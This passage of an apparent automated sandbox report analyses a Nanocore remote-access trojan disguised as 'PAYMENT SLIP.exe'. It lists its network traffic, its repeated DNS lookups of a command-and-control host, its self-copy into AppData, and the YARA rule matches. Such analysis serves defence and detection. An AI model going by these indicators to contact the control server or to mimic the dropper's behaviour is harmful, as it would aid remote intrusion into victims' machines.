            May 12, 2021 15:42:40.273298979 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.273318052 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.273323059 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.273346901 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.273366928 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.423427105 CEST4968480192.168.2.493.184.220.29
            May 12, 2021 15:42:40.423468113 CEST49702443192.168.2.420.190.160.68
            May 12, 2021 15:42:40.450225115 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450259924 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450282097 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450304985 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450326920 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450345039 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450350046 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450378895 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450381041 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450403929 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450404882 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450428009 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450431108 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450452089 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450454950 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450478077 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450478077 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450500965 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450510025 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450525045 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450527906 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450551987 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450556040 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450577021 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450582981 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450591087 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450608969 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450632095 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450654030 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450654030 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450675011 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450676918 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450699091 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450705051 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450722933 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450722933 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450746059 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450747013 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450768948 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450773954 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450783014 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450798988 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450812101 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450820923 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450834990 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450845003 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450870037 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450870991 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450896025 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450900078 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450922012 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450926065 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450944901 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450948000 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450969934 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450970888 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.450983047 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.450994968 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451014996 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451036930 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451044083 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451059103 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451061964 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451066971 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451080084 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451080084 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451103926 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451103926 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451124907 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451124907 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451144934 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451149940 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451164007 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451174021 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451188087 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451198101 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451209068 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451221943 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451226950 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451245070 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451261997 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451267004 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451289892 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451291084 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451311111 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451311111 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451330900 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451337099 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451353073 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451361895 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.451384068 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.451400995 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.467123985 CEST804968493.184.220.29192.168.2.4
            May 12, 2021 15:42:40.467257023 CEST4968480192.168.2.493.184.220.29
            May 12, 2021 15:42:40.474023104 CEST4434970220.190.160.68192.168.2.4
            May 12, 2021 15:42:40.474150896 CEST49702443192.168.2.420.190.160.68
            May 12, 2021 15:42:40.485577106 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.579103947 CEST49682443192.168.2.420.190.159.138
            May 12, 2021 15:42:40.579121113 CEST49683443192.168.2.420.190.159.138
            May 12, 2021 15:42:40.620743990 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.620778084 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.620800018 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.620822906 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.620842934 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.620848894 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.620865107 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.620887041 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.620908976 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621016026 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621062994 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621134996 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621159077 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621177912 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621181011 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621207952 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621218920 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621227980 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621236086 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621253014 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621263981 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621279955 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621290922 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621296883 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621340036 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621433020 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621459007 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621481895 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621484041 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621504068 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621514082 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621526957 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621536970 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621562958 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621563911 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621583939 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621587992 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621603012 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621613026 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621629000 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621635914 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621649981 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621660948 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621675014 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621684074 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621705055 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621714115 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621731043 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621748924 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621756077 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621777058 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621783018 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621799946 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621815920 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621820927 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621841908 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621845961 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621862888 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621876001 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621886015 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621910095 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621917963 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621942997 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621948957 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621958017 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621972084 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.621980906 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.621995926 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622016907 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622018099 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622040033 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622047901 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622062922 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622066975 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622086048 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622097015 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622112036 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622112989 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622137070 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622139931 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622159004 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622162104 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622180939 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622181892 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622199059 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622206926 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622221947 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622234106 CEST30304977323.254.130.71192.168.2.4
            May 12, 2021 15:42:40.622248888 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.622272015 CEST497733030192.168.2.423.254.130.71
            May 12, 2021 15:42:40.641460896 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:42:40.641472101 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:42:40.641635895 CEST49683443192.168.2.420.190.159.138
            May 12, 2021 15:42:40.641678095 CEST49682443192.168.2.420.190.159.138
            May 12, 2021 15:42:44.654952049 CEST497773030192.168.2.423.254.130.71
            May 12, 2021 15:42:44.822844028 CEST30304977723.254.130.71192.168.2.4
            May 12, 2021 15:42:44.823087931 CEST497773030192.168.2.423.254.130.71
            May 12, 2021 15:42:44.823846102 CEST497773030192.168.2.423.254.130.71
            May 12, 2021 15:42:44.997028112 CEST30304977723.254.130.71192.168.2.4
            May 12, 2021 15:42:45.000108957 CEST497773030192.168.2.423.254.130.71
            May 12, 2021 15:42:45.167934895 CEST30304977723.254.130.71192.168.2.4
            May 12, 2021 15:42:45.168529987 CEST497773030192.168.2.423.254.130.71
            May 12, 2021 15:42:45.205004930 CEST497773030192.168.2.423.254.130.71
            May 12, 2021 15:42:49.337255955 CEST497783030192.168.2.423.254.130.71
            May 12, 2021 15:42:49.507675886 CEST30304977823.254.130.71192.168.2.4
            May 12, 2021 15:42:49.507824898 CEST497783030192.168.2.423.254.130.71
            May 12, 2021 15:42:49.508872986 CEST497783030192.168.2.423.254.130.71
            May 12, 2021 15:42:49.684366941 CEST30304977823.254.130.71192.168.2.4
            May 12, 2021 15:42:49.684606075 CEST497783030192.168.2.423.254.130.71
            May 12, 2021 15:42:49.845926046 CEST497783030192.168.2.423.254.130.71
            May 12, 2021 15:42:49.859746933 CEST30304977823.254.130.71192.168.2.4
            May 12, 2021 15:42:49.859911919 CEST497783030192.168.2.423.254.130.71
            May 12, 2021 15:42:51.917212963 CEST8049809142.250.185.206192.168.2.4
            May 12, 2021 15:42:51.917290926 CEST4980980192.168.2.4142.250.185.206
            May 12, 2021 15:42:53.614896059 CEST44349689131.253.33.200192.168.2.4
            May 12, 2021 15:42:54.228492022 CEST497793030192.168.2.423.254.130.71
            May 12, 2021 15:42:54.311407089 CEST804970393.184.220.29192.168.2.4
            May 12, 2021 15:42:54.311533928 CEST4970380192.168.2.493.184.220.29
            May 12, 2021 15:42:54.395555973 CEST30304977923.254.130.71192.168.2.4
            May 12, 2021 15:43:10.999643087 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:11.227674007 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:11.229006052 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:11.408246994 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:11.411412001 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:11.577680111 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:11.578917027 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:11.786355972 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:12.546447992 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:12.597297907 CEST497813030192.168.2.423.254.130.71

            UDP Packets


            DNS Queries

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
            May 12, 2021 15:41:34.259408951 CEST | 192.168.2.4 | 8.8.8.8 | 0xaa10 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:41:41.593622923 CEST | 192.168.2.4 | 8.8.8.8 | 0x15dd | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:41:46.336102009 CEST | 192.168.2.4 | 8.8.8.8 | 0x49fd | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:41:51.142338037 CEST | 192.168.2.4 | 8.8.8.8 | 0x7b21 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:41:55.850594044 CEST | 192.168.2.4 | 8.8.8.8 | 0x1687 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:00.509931087 CEST | 192.168.2.4 | 8.8.8.8 | 0x958c | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:05.186784983 CEST | 192.168.2.4 | 8.8.8.8 | 0x1b63 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:11.425129890 CEST | 192.168.2.4 | 8.8.8.8 | 0x6ee1 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:18.821676016 CEST | 192.168.2.4 | 8.8.8.8 | 0x780a | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:25.091231108 CEST | 192.168.2.4 | 8.8.8.8 | 0x4ab5 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:31.332638025 CEST | 192.168.2.4 | 8.8.8.8 | 0xcf2f | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:38.191953897 CEST | 192.168.2.4 | 8.8.8.8 | 0x9831 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:44.560812950 CEST | 192.168.2.4 | 8.8.8.8 | 0xb990 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:49.266288042 CEST | 192.168.2.4 | 8.8.8.8 | 0xdd77 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:54.101478100 CEST | 192.168.2.4 | 8.8.8.8 | 0x5c0f | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:43:02.405359030 CEST | 192.168.2.4 | 8.8.8.8 | 0x28cd | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)
            May 12, 2021 15:43:07.135113955 CEST | 192.168.2.4 | 8.8.8.8 | 0xaa22 | Standard query (0) | seaudo.hopto.org | A (IP address) | IN (0x0001)

            DNS Answers

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
            May 12, 2021 15:41:34.319515944 CEST | 8.8.8.8 | 192.168.2.4 | 0xaa10 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:41:41.655122995 CEST | 8.8.8.8 | 192.168.2.4 | 0x15dd | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:41:46.398098946 CEST | 8.8.8.8 | 192.168.2.4 | 0x49fd | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:41:51.202563047 CEST | 8.8.8.8 | 192.168.2.4 | 0x7b21 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:41:55.899343967 CEST | 8.8.8.8 | 192.168.2.4 | 0x1687 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:00.569497108 CEST | 8.8.8.8 | 192.168.2.4 | 0x958c | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:05.250067949 CEST | 8.8.8.8 | 192.168.2.4 | 0x1b63 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:11.482409954 CEST | 8.8.8.8 | 192.168.2.4 | 0x6ee1 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:18.879184008 CEST | 8.8.8.8 | 192.168.2.4 | 0x780a | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:25.154309034 CEST | 8.8.8.8 | 192.168.2.4 | 0x4ab5 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:31.389828920 CEST | 8.8.8.8 | 192.168.2.4 | 0xcf2f | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:38.251568079 CEST | 8.8.8.8 | 192.168.2.4 | 0x9831 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:44.619924068 CEST | 8.8.8.8 | 192.168.2.4 | 0xb990 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:49.323539972 CEST | 8.8.8.8 | 192.168.2.4 | 0xdd77 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:42:54.160172939 CEST | 8.8.8.8 | 192.168.2.4 | 0x5c0f | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:43:02.468023062 CEST | 8.8.8.8 | 192.168.2.4 | 0x28cd | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)
            May 12, 2021 15:43:07.192173004 CEST | 8.8.8.8 | 192.168.2.4 | 0xaa22 | No error (0) | seaudo.hopto.org |  | 23.254.130.71 | A (IP address) | IN (0x0001)

            Code Manipulations

            System Behavior

            General

            Start time:15:41:03
            Start date:12/05/2021
            Path:C:\Users\user\Desktop\PAYMENT SLIP.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:15:41:09
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x70000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:15:41:13
            Start date:12/05/2021
            Path:C:\Users\user\Desktop\PAYMENT SLIP.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:15:41:20
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x1f0000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:15:41:21
            Start date:12/05/2021
            Path:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 43%, ReversingLabs
            Reputation:low

            General

            Start time:15:41:26
            Start date:12/05/2021
            Path:C:\Users\user\Desktop\PAYMENT SLIP.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, Author: Florian Roth
